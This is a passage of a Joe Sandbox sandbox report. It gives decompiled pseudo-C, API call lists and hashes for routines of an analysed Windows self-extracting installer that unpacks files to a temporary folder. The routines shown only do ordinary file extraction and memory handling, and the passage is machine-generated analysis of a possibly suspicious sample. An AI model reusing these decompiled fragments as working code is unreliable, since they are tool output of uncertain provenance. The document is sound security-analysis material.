                                                                        				long _t35;
                                                                        				long _t36;
                                                                        				struct HWND__* _t37;
                                                                        				long _t38;
                                                                        				long _t39;
                                                                        				long _t41;
                                                                        				long _t44;
                                                                        				long _t45;
                                                                        				long _t46;
                                                                        				signed int _t50;
                                                                        				long _t51;
                                                                        				char* _t58;
                                                                        				long _t59;
                                                                        				char* _t63;
                                                                        				long _t64;
                                                                        				CHAR* _t71;
                                                                        				CHAR* _t74;
                                                                        				int _t75;
                                                                        				signed int _t76;
                                                                        
                                                                        				_t69 = __edx;
                                                                        				_t29 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_t30 = _t29 ^ _t76;
                                                                        				_v8 = _t30;
                                                                        				_t75 = _a8;
                                                                        				if( *0x3d91d8 == 0) {
                                                                        					_t32 = _a4;
                                                                        					__eflags = _t32;
                                                                        					if(_t32 == 0) {
                                                                        						_t33 = E003D4E99(_t75);
                                                                        						L35:
                                                                        						return E003D6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                        					}
                                                                        					_t35 = _t32 - 1;
                                                                        					__eflags = _t35;
                                                                        					if(_t35 == 0) {
                                                                        						L9:
                                                                        						_t33 = 0;
                                                                        						goto L35;
                                                                        					}
                                                                        					_t36 = _t35 - 1;
                                                                        					__eflags = _t36;
                                                                        					if(_t36 == 0) {
                                                                        						_t37 =  *0x3d8584; // 0x0
                                                                        						__eflags = _t37;
                                                                        						if(_t37 != 0) {
                                                                        							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                        						}
                                                                        						_t54 = 0x3d91e4;
                                                                        						_t58 = 0x3d91e4;
                                                                        						do {
                                                                        							_t38 =  *_t58;
                                                                        							_t58 =  &(_t58[1]);
                                                                        							__eflags = _t38;
                                                                        						} while (_t38 != 0);
                                                                        						_t59 = _t58 - 0x3d91e5;
                                                                        						__eflags = _t59;
                                                                        						_t71 =  *(_t75 + 4);
                                                                        						_t73 =  &(_t71[1]);
                                                                        						do {
                                                                        							_t39 =  *_t71;
                                                                        							_t71 =  &(_t71[1]);
                                                                        							__eflags = _t39;
                                                                        						} while (_t39 != 0);
                                                                        						_t69 = _t71 - _t73;
                                                                        						_t30 = _t59 + 1 + _t71 - _t73;
                                                                        						__eflags = _t30 - 0x104;
                                                                        						if(_t30 >= 0x104) {
                                                                        							L3:
                                                                        							_t33 = _t30 | 0xffffffff;
                                                                        							goto L35;
                                                                        						}
                                                                        						_t69 = 0x3d91e4;
                                                                        						_t30 = E003D4702( &_v268, 0x3d91e4,  *(_t75 + 4));
                                                                        						__eflags = _t30;
                                                                        						if(__eflags == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t41 = E003D476D( &_v268, __eflags);
                                                                        						__eflags = _t41;
                                                                        						if(_t41 == 0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						_push(0x180);
                                                                        						_t30 = E003D4980( &_v268, 0x8302); // executed
                                                                        						_t75 = _t30;
                                                                        						__eflags = _t75 - 0xffffffff;
                                                                        						if(_t75 == 0xffffffff) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t30 = E003D47E0( &_v268);
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						 *0x3d93f4 =  *0x3d93f4 + 1;
                                                                        						_t33 = _t75;
                                                                        						goto L35;
                                                                        					}
                                                                        					_t44 = _t36 - 1;
                                                                        					__eflags = _t44;
                                                                        					if(_t44 == 0) {
                                                                        						_t54 = 0x3d91e4;
                                                                        						_t63 = 0x3d91e4;
                                                                        						do {
                                                                        							_t45 =  *_t63;
                                                                        							_t63 =  &(_t63[1]);
                                                                        							__eflags = _t45;
                                                                        						} while (_t45 != 0);
                                                                        						_t74 =  *(_t75 + 4);
                                                                        						_t64 = _t63 - 0x3d91e5;
                                                                        						__eflags = _t64;
                                                                        						_t69 =  &(_t74[1]);
                                                                        						do {
                                                                        							_t46 =  *_t74;
                                                                        							_t74 =  &(_t74[1]);
                                                                        							__eflags = _t46;
                                                                        						} while (_t46 != 0);
                                                                        						_t73 = _t74 - _t69;
                                                                        						_t30 = _t64 + 1 + _t74 - _t69;
                                                                        						__eflags = _t30 - 0x104;
                                                                        						if(_t30 >= 0x104) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t69 = 0x3d91e4;
                                                                        						_t30 = E003D4702( &_v268, 0x3d91e4,  *(_t75 + 4));
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                        						_t30 = E003D4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						E003D4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                        						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                        						__eflags = _t50;
                                                                        						if(_t50 != 0) {
                                                                        							_t51 = _t50 & 0x00000027;
                                                                        							__eflags = _t51;
                                                                        						} else {
                                                                        							_t51 = 0x80;
                                                                        						}
                                                                        						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						} else {
                                                                        							_t33 = 1;
                                                                        							goto L35;
                                                                        						}
                                                                        					}
                                                                        					_t30 = _t44 - 1;
                                                                        					__eflags = _t30;
                                                                        					if(_t30 == 0) {
                                                                        						goto L3;
                                                                        					}
                                                                        					goto L9;
                                                                        				}
                                                                        				if(_a4 == 3) {
                                                                        					_t30 = E003D4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                        				}
                                                                        				goto L3;
                                                                        			}
































                                                                        APIs
                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 003D4DB5
                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 003D4DDD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFileItemText
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                        • API String ID: 3625706803-1955631000
                                                                        • Opcode ID: 05a9a8556d7bc5c462f357a70929462e6e1e8964c88e9acda87d8c86824f4606
                                                                        • Instruction ID: 38936d8eca2baf7a8319f440c7c9c71edce1a32be0e855960d1ee92b25eb1b2f
                                                                        • Opcode Fuzzy Hash: 05a9a8556d7bc5c462f357a70929462e6e1e8964c88e9acda87d8c86824f4606
                                                                        • Instruction Fuzzy Hash: E841F3372001019BCB379F38FD546B573AAEB45300F05466BE8D69B786DA31DE5AC790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D4C37(signed int __ecx, int __edx, int _a4) {
                                                                        				struct _FILETIME _v12;
                                                                        				struct _FILETIME _v20;
                                                                        				FILETIME* _t14;
                                                                        				int _t15;
                                                                        				signed int _t21;
                                                                        
                                                                        				_t21 = __ecx * 0x18;
                                                                        				if( *((intOrPtr*)(_t21 + 0x3d8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                        					L5:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t14 =  &_v12;
                                                                        					_t15 = SetFileTime( *(_t21 + 0x3d8d74), _t14, _t14, _t14); // executed
                                                                        					if(_t15 == 0) {
                                                                        						goto L5;
                                                                        					}
                                                                        					return 1;
                                                                        				}
                                                                        			}









                                                                        APIs
                                                                        • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 003D4C54
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003D4C66
                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 003D4C7E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Time$File$DateLocal
                                                                        • String ID:
                                                                        • API String ID: 2071732420-0
                                                                        • Opcode ID: 88427d75adfc867e307a433d40a30f4e9579d063b2b1561418b04d9c0b6132b4
                                                                        • Instruction ID: 1d5152aa3b96abc7bd20280f5ca67471eb849044ebb638b5ebf56c9d2565082c
                                                                        • Opcode Fuzzy Hash: 88427d75adfc867e307a433d40a30f4e9579d063b2b1561418b04d9c0b6132b4
                                                                        • Instruction Fuzzy Hash: E0F0907361220DBF9B26DFB5ED49DBB77ADEB04340B44062BB816C2190FA30E914D7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E003D487A(CHAR* __ecx, signed int __edx) {
                                                                        				void* _t7;
                                                                        				CHAR* _t11;
                                                                        				long _t18;
                                                                        				long _t23;
                                                                        
                                                                        				_t11 = __ecx;
                                                                        				asm("sbb edi, edi");
                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                        				if((__edx & 0x00000100) == 0) {
                                                                        					asm("sbb esi, esi");
                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                        				} else {
                                                                        					if((__edx & 0x00000400) == 0) {
                                                                        						asm("sbb esi, esi");
                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                        					} else {
                                                                        						_t23 = 1;
                                                                        					}
                                                                        				}
                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                        					return _t7;
                                                                        				} else {
                                                                        					E003D490C(_t11);
                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                        				}
                                                                        			}








                                                                        APIs
                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,003D4A23,?,003D4F67,*MEMCAB,00008000,00000180), ref: 003D48DE
                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,003D4F67,*MEMCAB,00008000,00000180), ref: 003D4902
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 0dcb80d992d95a2620c2b7294e06398d255e4c9750ca5dd4a22c18b63f7f2e36
                                                                        • Instruction ID: be76f4426a897a00eda821396cde303898b9700c3627c5fb99fd3c6da4c5e826
                                                                        • Opcode Fuzzy Hash: 0dcb80d992d95a2620c2b7294e06398d255e4c9750ca5dd4a22c18b63f7f2e36
                                                                        • Instruction Fuzzy Hash: 0C018BA3E125302BF326402AAC88FB7460CCB96771F1B0332BDEAE72C1D2744C0091E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E003D4AD0(signed int _a4, void* _a8, long _a12) {
                                                                        				signed int _t9;
                                                                        				int _t12;
                                                                        				signed int _t14;
                                                                        				signed int _t15;
                                                                        				void* _t20;
                                                                        				struct HWND__* _t21;
                                                                        				signed int _t24;
                                                                        				signed int _t25;
                                                                        
                                                                        				_t20 =  *0x3d858c; // 0x270
                                                                        				_t9 = E003D3680(_t20);
                                                                        				if( *0x3d91d8 == 0) {
                                                                        					_push(_t24);
                                                                        					_t12 = WriteFile( *(0x3d8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                        					if(_t12 != 0) {
                                                                        						_t25 = _a12;
                                                                        						if(_t25 != 0xffffffff) {
                                                                        							_t14 =  *0x3d9400; // 0x8fc00
                                                                        							_t15 = _t14 + _t25;
                                                                        							 *0x3d9400 = _t15;
                                                                        							if( *0x3d8184 != 0) {
                                                                        								_t21 =  *0x3d8584; // 0x0
                                                                        								if(_t21 != 0) {
                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x3d93f8, 0);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t25 = _t24 | 0xffffffff;
                                                                        					}
                                                                        					return _t25;
                                                                        				} else {
                                                                        					return _t9 | 0xffffffff;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                          • Part of subcall function 003D3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 003D369F
                                                                          • Part of subcall function 003D3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003D36B2
                                                                          • Part of subcall function 003D3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003D36DA
                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 003D4B05
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                        • String ID:
                                                                        • API String ID: 1084409-0
                                                                        • Opcode ID: 9b16797a01057913350c1c620db1d2c6d1b2f63cbcb948b5d5f8a7864a9113db
                                                                        • Instruction ID: c4f08dc06aa5343826d9e4a52a9313d530d39ad32da5c9639c4591d79d61aeab
                                                                        • Opcode Fuzzy Hash: 9b16797a01057913350c1c620db1d2c6d1b2f63cbcb948b5d5f8a7864a9113db
                                                                        • Instruction Fuzzy Hash: 04018C32201205ABDB168F69FC05BA2776DEB58725F058227F9799B2E0CB70D812CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D658A(char* __ecx, void* __edx, char* _a4) {
                                                                        				intOrPtr _t4;
                                                                        				char* _t6;
                                                                        				char* _t8;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				char* _t16;
                                                                        				intOrPtr* _t17;
                                                                        				void* _t18;
                                                                        				char* _t19;
                                                                        
                                                                        				_t16 = __ecx;
                                                                        				_t10 = __edx;
                                                                        				_t17 = __ecx;
                                                                        				_t1 = _t17 + 1; // 0x3d8b3f
                                                                        				_t12 = _t1;
                                                                        				do {
                                                                        					_t4 =  *_t17;
                                                                        					_t17 = _t17 + 1;
                                                                        				} while (_t4 != 0);
                                                                        				_t18 = _t17 - _t12;
                                                                        				_t2 = _t18 + 1; // 0x3d8b40
                                                                        				if(_t2 < __edx) {
                                                                        					_t19 = _t18 + __ecx;
                                                                        					if(_t19 > __ecx) {
                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                        						if( *_t8 != 0x5c) {
                                                                        							 *_t19 = 0x5c;
                                                                        							_t19 =  &(_t19[1]);
                                                                        						}
                                                                        					}
                                                                        					_t6 = _a4;
                                                                        					 *_t19 = 0;
                                                                        					while( *_t6 == 0x20) {
                                                                        						_t6 = _t6 + 1;
                                                                        					}
                                                                        					return E003D16B3(_t16, _t10, _t6);
                                                                        				}
                                                                        				return 0x8007007a;
                                                                        			}


                                                                        APIs
                                                                        • CharPrevA.USER32(003D8B3E,003D8B3F,00000001,003D8B3E,-00000003,?,003D60EC,003D1140,?), ref: 003D65BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrev
                                                                        • String ID:
                                                                        • API String ID: 122130370-0
                                                                        • Opcode ID: 04e4832a8e232ed6d0bbc5f82ddca92ae4a22c43c8770e2a95e789a49653ab5f
                                                                        • Instruction ID: 90ba5180af8833dfdc08a3bd6369330b56b55a4a0bdc9a7d2ab860f2fe3410d5
                                                                        • Opcode Fuzzy Hash: 04e4832a8e232ed6d0bbc5f82ddca92ae4a22c43c8770e2a95e789a49653ab5f
                                                                        • Instruction Fuzzy Hash: 3BF028331042509BD733491DB884B66BFDF9B97350F2A016FF8FA8330ACA658C8586A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E003D621E() {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				signed int _t5;
                                                                        				void* _t9;
                                                                        				void* _t13;
                                                                        				void* _t19;
                                                                        				void* _t20;
                                                                        				signed int _t21;
                                                                        
                                                                        				_t5 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t5 ^ _t21;
                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                        					0x4f0 = 2;
                                                                        					_t9 = E003D597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                        				} else {
                                                                        					E003D44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                        					 *0x3d9124 = E003D6285();
                                                                        					_t9 = 0;
                                                                        				}
                                                                        				return E003D6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                        			}


                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003D623F
                                                                          • Part of subcall function 003D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                          • Part of subcall function 003D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                          • Part of subcall function 003D6285: GetLastError.KERNEL32(003D5BBC), ref: 003D6285
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                        • String ID:
                                                                        • API String ID: 381621628-0
                                                                        • Opcode ID: 3ec6c85390a745a0bbedef81e918d710d9cadbf8a598d3168d41ab345cb202bd
                                                                        • Instruction ID: 0fd755e52d7d369c437c95073b4ef6706002753a74c7f842b0a3ba68284d60ef
                                                                        • Opcode Fuzzy Hash: 3ec6c85390a745a0bbedef81e918d710d9cadbf8a598d3168d41ab345cb202bd
                                                                        • Instruction Fuzzy Hash: 84F0BEB2604208ABE752EB74ED03FBE33BCDB44300F40046BA996DA282EE7499848650
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D4B60(signed int _a4) {
                                                                        				signed int _t9;
                                                                        				signed int _t15;
                                                                        
                                                                        				_t15 = _a4 * 0x18;
                                                                        				if( *((intOrPtr*)(_t15 + 0x3d8d64)) != 1) {
                                                                        					_t9 = FindCloseChangeNotification( *(_t15 + 0x3d8d74)); // executed
                                                                        					if(_t9 == 0) {
                                                                        						return _t9 | 0xffffffff;
                                                                        					}
                                                                        					 *((intOrPtr*)(_t15 + 0x3d8d60)) = 1;
                                                                        					return 0;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t15 + 0x3d8d60)) = 1;
                                                                        				 *((intOrPtr*)(_t15 + 0x3d8d68)) = 0;
                                                                        				 *((intOrPtr*)(_t15 + 0x3d8d70)) = 0;
                                                                        				 *((intOrPtr*)(_t15 + 0x3d8d6c)) = 0;
                                                                        				return 0;
                                                                        			}


                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,003D4FA1,00000000), ref: 003D4B98
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 4c14e83be25305aa0c8b33ffb0ff03ddc6876ba3442d7c458bd102297cccb83a
                                                                        • Instruction ID: 60bb84a32a40591b4c3112fb7b9ed42d9d4ec6607a5f884e8d712a60d2f21561
                                                                        • Opcode Fuzzy Hash: 4c14e83be25305aa0c8b33ffb0ff03ddc6876ba3442d7c458bd102297cccb83a
                                                                        • Instruction Fuzzy Hash: 34F0F471500B0C9F47639F39BC12652BFEABAA5360310092BA4AED25D0DB70B442CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D66AE(CHAR* __ecx) {
                                                                        				unsigned int _t1;
                                                                        
                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                        				if(_t1 != 0xffffffff) {
                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                        				} else {
                                                                        					return 0;
                                                                        				}
                                                                        			}





                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(?,003D4777,?,003D4E38,?), ref: 003D66B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 306d80e325fc231b87cd260c498dd763bb6facc83144a13d77394891b6bb9dc2
                                                                        • Instruction ID: 49f0daff61a9995337389d76f00ad4776447af2f7ee656d0006b76562ae27f4c
                                                                        • Opcode Fuzzy Hash: 306d80e325fc231b87cd260c498dd763bb6facc83144a13d77394891b6bb9dc2
                                                                        • Instruction Fuzzy Hash: 3DB09277222840426A2206357C2A5562945A6C133ABE55B96F032C02E0CA3EC846D004
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D4CA0(long _a4) {
                                                                        				void* _t2;
                                                                        
                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x003d4caa
                                                                        0x003d4cb1

                                                                        APIs
                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 003D4CAA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocGlobal
                                                                        • String ID:
                                                                        • API String ID: 3761449716-0
                                                                        • Opcode ID: 6115b82822c6f913ceed47e977ac936fdf5c677cc8ed9ae28ab2781ea9e01152
                                                                        • Instruction ID: 5e4d370b5ca5f92440d62b6049519aaad177e33c16f9a04b13d703bbb6b76bd8
                                                                        • Opcode Fuzzy Hash: 6115b82822c6f913ceed47e977ac936fdf5c677cc8ed9ae28ab2781ea9e01152
                                                                        • Instruction Fuzzy Hash: DFB0123204420CB7CF012FD2FC09F853F1DEBC4761F144001F60C45050CA7294108696
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D4CC0(void* _a4) {
                                                                        				void* _t2;
                                                                        
                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x003d4cc8
                                                                        0x003d4ccf

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FreeGlobal
                                                                        • String ID:
                                                                        • API String ID: 2979337801-0
                                                                        • Opcode ID: b0e71f397b961cea7ae9939d8d1496909a183a6cb5c95c9545e5339080feeb36
                                                                        • Instruction ID: 9999325ce882df45bdc908bde2e55085ffe00a262c70e22a97c799cff34cdf38
                                                                        • Opcode Fuzzy Hash: b0e71f397b961cea7ae9939d8d1496909a183a6cb5c95c9545e5339080feeb36
                                                                        • Instruction Fuzzy Hash: A8B0123100010CB78F012B52FD088453F1DD6C4360B000011F50C41021CB3398118585
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E003D5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				CHAR* _v265;
                                                                        				char _v266;
                                                                        				char _v267;
                                                                        				char _v268;
                                                                        				CHAR* _v272;
                                                                        				char _v276;
                                                                        				signed int _v296;
                                                                        				char _v556;
                                                                        				signed int _t61;
                                                                        				int _t63;
                                                                        				char _t67;
                                                                        				CHAR* _t69;
                                                                        				signed int _t71;
